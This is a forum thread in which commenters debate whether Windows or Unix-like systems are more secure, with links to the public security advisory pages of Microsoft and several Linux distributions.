Kind of a broad statement there, isn't it?

By your logic - Where do zero day Windows vulnerabilities come from then? People outside of Microsoft have certainly reported security issues to Microsoft in the past.

I meant specifically in the source code but you're right.

Heh, yeah - those two major failures certainly overshadow the hundreds of issues Win has. :)

Can you name those hundreds of issues discovered on Windows stack for, say, 2014? I'm on IIS and I really want to know if I'm missing something.

MS had its fair share of security flaws in the past but give them credit for their current state. You sound like people still talking about BSODs, while that's certainly a thing of the past.

I get BSODs all the time on Windows 8.1 because of my video card drivers.

Here is the list of security advisories for all Microsoft products and they even list some non-Microsoft products like Adobe Flash, etc:

- https://technet.microsoft.com/en-us/library/security/dn63193...

I don't know where to get the multitude of security advisories for Unix systems listed all in one spot, but here are some links for popular distros:

- https://www.debian.org/security/

- http://www.ubuntu.com/usn/

- https://access.redhat.com/security/updates/active/

- http://www.slackware.com/security/list.php?l=slackware-secur...

Anyone know where to go in order to get the Unix vulns all in one list?

I was under the impression that windows server is pretty stable/secure these days.

Do two hugely impactful nix-centric security bugs overshadow the hundreds of minor ones found in Microsoft products?

Yes, certainly.
